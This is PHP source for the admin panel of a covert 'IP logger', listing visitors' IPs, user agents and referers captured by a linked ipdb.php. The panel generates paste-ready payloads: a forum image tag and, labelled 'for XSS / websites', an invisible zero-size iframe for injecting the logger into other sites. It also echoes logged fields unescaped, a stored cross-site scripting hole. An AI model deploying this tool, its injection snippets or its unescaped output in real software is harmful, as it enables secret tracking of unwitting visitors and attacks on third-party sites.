<?php error_reporting(0);
session_start(); 
if (isset($_SESSION['connect'])) {

?>
<html>
<head>
<title>
Boxxy Ip logger // ADMIN
</title>
<LINK HREF="style.css" REL="stylesheet" TYPE="text/css">
</head>
<body>
<?php  include 'config.php'; ?>
/////////// Dont fuck this up!//////////
<script>
function makesure() {
  if (confirm('Are you sure you want to empty the db.. Continue?')) {
  }
  else {
    return false;
  }
}
</script>
<?php  include 'version.php'; ?>
<?php
$ifdownserver="<a class=btn href=./admin.php?con=1><font color=#32CD32>Logger is online</font></a>";
$ifupserver="<a class=btn href=./admin.php?con=2><font color=#FF0000>Logger is offline</font></a>";
?>
<div id="nav">
<center>
<p>
<a href="#" onclick="location.reload();">refresh</a> - <a href="export.php">Export</a> - <a href="drop.php" onclick="return makesure();"><font color="red">RESET DB</font></a> - 
<?php
if (file_exists('./ipdb.php')) { print $ifdownserver; }
if (file_exists('./_ipdb.php')) { print $ifupserver; }
?>
 - <a href="logout.php">Logout</a>
</p>
</center>
</div>

<div id="sort">
<center>Sort by: ID <a href="?s=ida">v</a> <a href="?s=idd">^</a>  - IP <a href="?s=ipa">v</a> <a href="?s=ipd">^</a> - User agent <a href="?s=useragenta">v</a> <a href="?s=useragentd">^</a> - Referer <a href="?s=refa">v</a> <a href="?s=refd">^</a><!-- - <a href="?s=date">Date</a>-->
</center>
</div>

<div id="content">
    for forums:<br /><font color="lightgreen"><?php echo htmlspecialchars('<img>http://' . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']) . '/ipdb.php</img>'); ?><br /></font>
    for XSS / websites:<br /><font color="lightgreen"><?php echo htmlspecialchars('<iframe src="http://' . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']) . '/ipdb.php" width="0px" height="0px" frameborder="0"></iframe>'); ?><br /></font>
<!-- add -->
<div id="add">
<table width="300" border="0" align="center" cellpadding="0" cellspacing="1">
<tr>
<form name="add" method="post" action="add.php">
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1">
<tr>
<td colspan="3"><strong>Add to DB</strong></td>
</tr>
<tr>
<td width="78">ip:</td>
<td width="320"><input name="ip" type="text"></td>
</tr>
<tr>
<td width="400">User agent:</td>
<td width="330"><input name="user_agent" type="text"></td>
</tr>
<tr>
<td width="400">Referer:</td>
<td width="330"><input name="referer" type="text"></td>
</tr>
<table>
<tr>
<td>
<input type="submit" name="Submit" value="add" style="width: 250px;">
</td>
</tr>
</table>
</form>
</tr>
</table>
</td>
</tr>
</table>
</div>
<!-- add -->
<!-- remove -->
<div id="remove">
<table width="300" border="0" align="center" cellpadding="0" cellspacing="1">
<tr>
<form name="remove" method="post" action="remove.php">
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1">
<tr>
<td colspan="3"><strong>Remove from DB</strong></td>
</tr>
<tr>
<td width="78">id:</td>
<td width="320"><input name="id" type="text"><input type="submit" name="Submit" value="remove"><br /></td>
</form>
</tr>
</table>
</td>
</tr>
</table>
</div>
<!-- edit -->
<div id="edit">
<table width="300" border="0" align="center" cellpadding="0" cellspacing="1">
<tr>
<form name="edit" method="post" action="edit.php">
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1">
<tr>
<td colspan="3"><strong>edit entry DB</strong></td>
</tr>
<tr>
<td width="78">id:</td>
<td width="320"><input name="id" type="text"><input type="submit" name="Submit" value="edit"><br /></td>
</form>
</tr>
</table>
</td>
</tr>
</table>
</div>
<!-- edit -->
<!-- search -->
<div id="search">
<table width="300" border="0" align="center" cellpadding="0" cellspacing="1">
<tr>
<form name="edit" method="post" action="admin.php">
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1">
<tr>
<td colspan="3"><strong>Search DB</strong></td>
</tr>
<tr>
<td width="70">Search:</td>
<td width="450"><input name="term" type="text"><input type="submit" name="Submit" value="Search"><br /></td>
</form>
</tr>
</table>
</td>
</tr>
</table>
</div>
<!-- search -->
</div>
<?php
$term = mysql_real_escape_string($_POST['term']);
if(!($term != NULL))
{
$sort = $_GET['s'];
if(!($sort != NULL))
{
$result = mysql_query("SELECT * FROM $tablename ORDER BY id ASC");
} else
if($sort == "ida"){
$result = mysql_query("SELECT * FROM $tablename ORDER BY id ASC");
} else
if($sort == "idd"){
$result = mysql_query("SELECT * FROM $tablename ORDER BY id DESC");
} else
if($sort == "ipa"){
$result = mysql_query("SELECT * FROM $tablename ORDER BY ip ASC");
} else
if($sort == "ipd"){
$result = mysql_query("SELECT * FROM $tablename ORDER BY ip DESC");
} else
if($sort == "refa"){
$result = mysql_query("SELECT * FROM $tablename ORDER BY ref ASC");
} else
if($sort == "refd"){
$result = mysql_query("SELECT * FROM $tablename ORDER BY ref DESC");
} else
if($sort == "useragenta"){
$result = mysql_query("SELECT * FROM $tablename ORDER BY agent ASC");
} else
if($sort == "useragentd"){
$result = mysql_query("SELECT * FROM $tablename ORDER BY agent DESC");
} else {
$result = mysql_query("SELECT * FROM $tablename ORDER BY id ASC");
}
} else {
$result = mysql_query("select * from $tablename where id like '%$term%' or ip like '%$term%' or agent like '%$term%' or ref like '%$term%' or tm like '%$term%'"); 
}
  echo "<div id='wrapper'>";
while($row = mysql_fetch_array($result))
  {
  echo "<div id='ip'>ID: ". $row['id'] . "<br /> IP: <a href='http://www.ip-adress.com/ip_tracer/" . $row['ip'] . "' target='_blank'>" . $row['ip'] . "</a><br /> User agent: " . $row['agent'] . "<br /> Referer: " . $row['ref'] . "<br /> Logged @ " . $row["tm"] . "</div>";
  echo "<br />";
  }
  echo "</div>";
mysql_close($con);
?>
<div id="footer"><center>&copy Boxxy 2012 - 
<?php $result = mysql_query("SELECT * FROM $tablename", $link);
$num_rows = mysql_num_rows($result);
echo "$num_rows IP(s) logged\n"; ?> - <?php echo $version; ?></center></div>
?>
<?php
$con=$_GET['con'];
?>
<?php
	mysql_close($hConnect);
}
if ($con==1)
{
rename("ipdb.php","_ipdb.php");
?>
<script type="text/javascript">
window.location = "./admin.php";
</script>
<?php
}
if ($con==2)
{
rename("_ipdb.php","ipdb.php");
?>
<script type="text/javascript">
window.location = "./admin.php";
</script>
<?php
}
else
{
header('Location: login.php');
}
?>

